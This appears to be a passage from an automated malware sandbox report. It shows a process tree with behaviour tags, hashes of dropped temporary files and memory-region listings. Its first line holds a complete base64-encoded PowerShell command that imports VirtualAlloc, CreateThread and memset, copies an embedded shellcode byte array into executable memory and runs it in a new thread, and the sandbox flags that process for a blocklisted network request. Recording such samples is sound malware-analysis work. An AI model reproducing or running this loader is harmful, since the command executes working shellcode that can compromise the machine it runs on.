          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABvAFMAUwBaACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAbwBTAFMAWgAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGIALAAwAHgANQA3ACwAMAB4ADAAMQAsADAAeABhADkALAAwAHgAZgBhACwAMAB4AGQAOQAsADAAeABlADgALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAYQAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGYALAAwAHgAOAAzACwAMAB4AGUAYQAsADAAeABmAGMALAAwAHgAMwAxACwAMAB4ADUAYQAsADAAeAAxADEALAAwAHgAMAAzACwAMAB4ADUAYQAsADAAeAAxADEALAAwAHgAZQAyACwAMAB4AGEAMgAsADAAeABmAGQALAAwAHgANAAxACwAMAB4ADcAOAAsADAAeAA0AGMALAAwAHgAZgBlACwAMAB4ADkAMQAsADAAeAAxAGQALAAwAHgAYwA1ACwAMAB4ADEAYgAsADAAeABhADAALAAwAHgAMQBkACwAMAB4AGIAMQAsADAAeAA2ADgALAAwAHgAOQAzACwAMAB4AGEAZAAsADAAeABiADIALAAwAHgAMwBkACwAMAB4ADEAOAAsADAAeAA0ADUALAAwAHgAOQA2ACwAMAB4AGQANQAsADAAeABhAGIALAAwAHgAMgBiACwAMAB4ADMAZQAsADAAeABkADkALAAwAHgAMQBjACwAMAB4ADgAMQAsADAAeAAxADgALAAwAHgAZAA0ACwAMAB4ADkAZAAsADAAeABiAGEALAAwAHgANQA4ACwAMAB4ADcANwAsADAAeAAxAGUALAAwAHgAYwAxACwAMAB4ADgAYwAsADAAeAA1ADcALAAwAHgAMQBmACwAMAB4ADAAYQAsADAAeABjADEALAAwAHgAOQA2ACwAMAB4ADUAOAAsADAAeAA3ADcALAAwAHgAMgBiACwAMAB4AGMAYQAsADAAeAAzADEALAAwAHgAZgAzACwAMAB4ADkAOQAsADAAeABmAGIALAAwAHgAMwA2ACwAMAB4ADQAOQAsADAAeAAyADEALAAwAHgANwA3ACwAMAB4ADAANAAsADAAeAA1AGYALAAwAHgAMgAxACwAMAB4ADYANAAsADAAeABkAGQALAAwAHgANQBlACwAMAB4ADAAMAAsADAAeAAzAGIALAAwAHgANQA1ACwAMAB4ADMAOQAsADAAeAA4ADIALAAwAHgAYgBkACwAMAB4AGIAYQAsADAAeAAzADEALAAwAHgAOABiACwAMAB4AGEANQAsADAAeABkAGYALAAwAHgANwBjACwAMAB4ADQAMgAsADAAeAA1AGQALAAwAHgAMgBiACwAMAB4ADAAYQAsADAAeAA1ADUALAAwAHgAYgA3ACwAMAB4ADYANQAsADAAeABmADMALAAwAHgAZgA5ACwAMAB4AGYANgAsADAAeAA0ADkALAAwAHgAMAA2ACwAMAB4ADAAMAAsADAAeAAzAGUALAAwAHgANgBkACwAMAB4AGYAOQAsADAAeAA3ADcALAAwAHgAMwA2ACwAMAB4ADgAZAAsADAAeAA4ADQALAAwAHgAOABmACwAMAB4ADgAZAAsADAAeABlAGYALAAwAHgANQAyACwAMAB4ADEAYQAsADAAeAAxADYALAAwAHgANQA3ACwAMAB4ADEAMAAsADAAeABiAGMALAAwAHgAZgAyACwAMAB4ADYAOQAsADAAeABmADUALAAwAHgANQBhACwAMAB4ADcAMAAsADAAeAA2ADUALAAwAHgAYgAyACwAMAB4ADIAOQAsADAAeABkAGUALAAwAHgANgBhACwAMAB4ADQANQAsADAAeABmAGUALAAwAHgANQA0ACwAMAB4ADkANgAsADAAeABjAGUALAAwAHgAMAAxACwAMAB4AGIAYgAsADAAeAAxAGUALAAwAHgAOQA0ACwAMAB4ADIANQAsADAAeAAxAGYALAAwAHgANwBhACwAMAB4ADQAZQAsADAAeAA0ADQALAAwAHgAMAA2ACwAMAB4ADIANgAsADAAeAAyADEALAAwAHgANwA5ACwAMAB4ADUAOAAsADAAeAA4ADkALAAwAHgAOQBlACwAMAB4AGQAZgAsADAAeAAxADIALAAwAHgAMgA0ACwAMAB4AGMAYQAsADAAeAA1ADIALAAwAHgANwA5ACwAMAB4ADIAMQAsADAAeAAzAGYALAAwAHgANQBlACwAMAB4ADgAMgAsADAAeABiADEALAAwAHgANQA3ACwAMAB4AGUAOQAsADAAeABmADEALAAwAHgAOAAzACwAMAB4AGYAOAAsADAAeAA0ADEALAAwAHgAOQBlACwAMAB4AGEAZgAsADAAeAA3ADEALAAwAHgANABmACwAMAB4ADUAOQAsADAAeABjAGYALAAwAHgAYQBiACwAMAB4ADMANwAsADAAeABmADUALAAwAHgAMgBlACwAMAB4ADUANAAsADAAeAA0ADcALAAwAHgAZABmACwAMAB4AGYANAAsADAAeAAwADAALAAwAHgAMQA3ACwAMAB4ADcANwAsADAAeABkAGMALAAwAHgAMgA4ACwAMAB4AGYAYwAsADAAeAA4ADcALAAwAHgAZQAxACwAMAB4AGYAYwAsADAAeAA1ADIALAAwAHgAZAA4ACwAMAB4ADQAZAAsADAAeABhAGYALAAwAHgAMQAyACwAMAB4ADgAOAAsADAAeAAyAGQALAAwAHgAMQBmACwAMAB4AGYAYQAsADAAeABjADIALAAwAHgAYQAxACwAMAB4ADQAMAAsADAAeAAxAGEALAAwAHgAZQBkACwAMAB4ADYAYgAsADAAeABlADkALAAwAHgAMwAyACwAMAB4ADAANQAsADAAeAA5ADQALAAwAHgAMQA2ACwAMAB4AGMAMgAsADAAeAA0ADIALAAwAHgAZgA1ACwAMAB4ADcANQAsADAAeABhADkALAAwAHgAZgA3ACwAMAB4ADgANwAsADAAeAA0AGIALAAwAHgAMQBlACwAMAB4AGMAMAAsADAAeAA1ADEALAAwAHgAOAAyACwAMAB4ADAANAAsADAAeAA0ADUALAAwAHgAZgBkACwAMAB4AGIAMQAsADAAeABhADAALAAwAHgAYwBiACwAMAB4ADcAMgAsADAAeAA2ADgALAAwAHgANAA3ACwAMAB4ADYANgAsADAAeAAxADIALAAwAHgANwA0ACwAMAB4AGYAZgAsADAAeAAyAGYALAAwAHgAZgA0ACwAMAB4ADQAMAAsADAAeAA3AGYALAAwAHgAZAAwACwAMAB4AGQAMAAsADAAeAAyADIALAAwAHgAMwBmACwAMAB4ADMAMwAsADAAeABiADEALAAwAHgAMwBlACwAMAB4AGUAZgAsADAAeAAyADMALAAwAHgANAA3ACwAMAB4ADMAZgAsADAAeAAxAGUALAAwAHgAZQA4ACwAMAB4AGMAZQAsADAAeABkADkALAAwAHgANABhACwAMAB4ADAAMAAsADAAeAA4ADcALAAwAHgANwAyACwAMAB4AGUAMgAsADAAeABiADkALAAwAHgAOAAyACwAMAB4ADAAOQAsADAAeAA5ADMALAAwAHgANAA2ACwAMAB4ADEAOQAsADAAeAA3ADQALAAwAHgAOQAzACwAMAB4AGMAZAAsADAAeABhAGUALAAwAHgAOAA4ACwAMAB4ADUAZAAsADAAeAAyADYALAAwAHgAZABhACwAMAB4ADkAYQAsADAAeAAwADkALAAwAHgAYwA2ACwAMAB4ADkAMQAsADAAeABjADEALAAwAHgAOQBmACwAMAB4AGQAOQAsADAAeAAwAGYALAAwAHgANgBmACwAMAB4ADEAZgAsADAAeAA0AGMALAAwAHgAYgA0ACwAMAB4ADIANgAsADAAeAA0ADgALAAwAHgAZgA4ACwAMAB4AGIANgAsADAAeAAxAGYALAAwAHgAYgBlACwAMAB4AGEANwAsADAAeAA0ADkALAAwAHgANABhACwAMAB4AGIANQAsADAAeAA2AGUALAAwAHgAZABjACwAMAB4ADMANQAsADAAeABhADEALAAwAHgAOABlACwAMAB4ADMAMAAsADAAeABiADYALAAwAHgAMwAxACwAMAB4AGQAOQAsADAAeAA1AGEALAAwAHgAYgA2ACwAMAB4ADUAOQAsADAAeABiAGQALAAwAHgAMwBlACwAMAB4AGUANQAsADAAeAA3AGMALAAwAHgAYwAyACwAMAB4AGUAYQAsADAAeAA5ADkALAAwAHgAMgBkACwAMAB4ADUANwAsADAAeAAxADUALAAwAHgAYwA4ACwAMAB4ADgAMgAsADAAeABmADAALAAwAHgANwBkACwAMAB4AGYANgAsADAAeABmAGQALAAwAHgAMwA3ACwAMAB4ADIAMgAsADAAeAAwADkALAAwAHgAMgA4ACwAMAB4AGMANgAsADAAeAAxAGUALAAwAHgAZABjACwAMAB4ADEANAAsADAAeABiAGMALAAwAHgANABlACwAMAB4AGQAYwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAMgBLAEsAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkADIASwBLAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJAAyAEsASwAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwA=
          4⤵
          • Blocklisted process makes network request
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1636
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ecwugerd\ecwugerd.cmdline"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4628
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES885A.tmp" "c:\Users\Admin\AppData\Local\Temp\ecwugerd\CSCF614E8EAB1614B4583BD7E6B30F7CAD6.TMP"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:4460

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES885A.tmp

    Filesize

    1KB

    MD5

    d52a87a4ec1c252ceb72c3e366bb0998

    SHA1

    fc5a9890ef3da9e2cda434c347fd2a3ff75ee0de

    SHA256

    2509f9901ccd7025ce1b41364fdff146734de5e89262b3ded44054ba0e4a2708

    SHA512

    9b46091f633211ea6e80012fbdae755c40581dfe610d603b9a957cbf13c42a54d3d2c098a240beaaf1fa24d65c3f933b05db04908ff93ea4b5877986a1b9a7a4

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q4pal0vl.04z.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\ecwugerd\ecwugerd.dll

    Filesize

    3KB

    MD5

    8bccf198bce3ec3639b6da180ca82ab3

    SHA1

    9f88cf888199c5023d24cac0f2401523734c69c2

    SHA256

    fd915122d4d428d466221f632231f85ddfcc355dc53377752c73a833a4116b0b

    SHA512

    079003ff35228bf3f3a27d439e0a152381bf176cede2079162584c6ad8374cd8e2399f5d20d9fca471d6e3dc67a262d72d01204fc66d18da03014aa2e0979cc5

  • \??\c:\Users\Admin\AppData\Local\Temp\ecwugerd\CSCF614E8EAB1614B4583BD7E6B30F7CAD6.TMP

    Filesize

    652B

    MD5

    f49106bdcf140840a2b363bddd434f46

    SHA1

    64c2974035a064aa93c7d2fb363cf93ba195d459

    SHA256

    ed40c39d9bec214270623e9994069cdab9af4343066726abcbd8ec22750f54ae

    SHA512

    1341d745c45300990d70e23a2523e448cc51bddffe91db8c29f533dcc8b7c6f26f68d91dc13fe23e558c416882ba658e033061e1d3dc1978b85ee16670edc0c7

  • \??\c:\Users\Admin\AppData\Local\Temp\ecwugerd\ecwugerd.0.cs

    Filesize

    557B

    MD5

    7319070c34daa5f6f2ece2dfc07119ee

    SHA1

    f26a4a48518a5608e93c8b77368f588b0433973c

    SHA256

    b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

    SHA512

    34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

  • \??\c:\Users\Admin\AppData\Local\Temp\ecwugerd\ecwugerd.cmdline

    Filesize

    369B

    MD5

    54b2277da8ac4201c6c16c92d47b73e0

    SHA1

    4b0cc7030e8f9e357e865ac93a3b53e496fb4a08

    SHA256

    fdf4ea03c97b22f2f121b8e783858062432b1dce4657eac1940f706c46661478

    SHA512

    a381996ff1085fd46770f5400fa9dc78fdca692608ae31b3822ea4b94e2344af626db7c2f2cb0ddf4b0dc53e5eeab5cd1dc32dddac133b80b532a526bf1460bc

  • memory/1484-0-0x0000000000400000-0x0000000000452000-memory.dmp

    Filesize

    328KB

  • memory/1636-23-0x0000000002A70000-0x0000000002AA6000-memory.dmp

    Filesize

    216KB

  • memory/1636-24-0x0000000005420000-0x0000000005A48000-memory.dmp

    Filesize

    6.2MB

  • memory/1636-26-0x0000000005220000-0x0000000005286000-memory.dmp

    Filesize

    408KB

  • memory/1636-27-0x0000000005290000-0x00000000052F6000-memory.dmp

    Filesize

    408KB

  • memory/1636-37-0x0000000005A50000-0x0000000005DA4000-memory.dmp

    Filesize

    3.3MB

  • memory/1636-38-0x0000000006040000-0x000000000605E000-memory.dmp

    Filesize

    120KB

  • memory/1636-39-0x0000000006080000-0x00000000060CC000-memory.dmp

    Filesize

    304KB

  • memory/1636-40-0x00000000078C0000-0x0000000007F3A000-memory.dmp

    Filesize

    6.5MB

  • memory/1636-41-0x0000000006580000-0x000000000659A000-memory.dmp

    Filesize

    104KB

  • memory/1636-25-0x0000000005080000-0x00000000050A2000-memory.dmp

    Filesize

    136KB

  • memory/1636-56-0x0000000006670000-0x0000000006671000-memory.dmp

    Filesize

    4KB

  • memory/1636-54-0x00000000065F0000-0x00000000065F8000-memory.dmp

    Filesize

    32KB

  • memory/2424-11-0x000001BE5B560000-0x000001BE5B582000-memory.dmp

    Filesize

    136KB

  • memory/2424-1-0x00007FFABBF33000-0x00007FFABBF35000-memory.dmp

    Filesize

    8KB

  • memory/2424-12-0x00007FFABBF30000-0x00007FFABC9F1000-memory.dmp

    Filesize

    10.8MB

  • memory/2424-13-0x00007FFABBF30000-0x00007FFABC9F1000-memory.dmp

    Filesize

    10.8MB

  • memory/2424-57-0x00007FFABBF33000-0x00007FFABBF35000-memory.dmp

    Filesize

    8KB

  • memory/2424-58-0x00007FFABBF30000-0x00007FFABC9F1000-memory.dmp

    Filesize

    10.8MB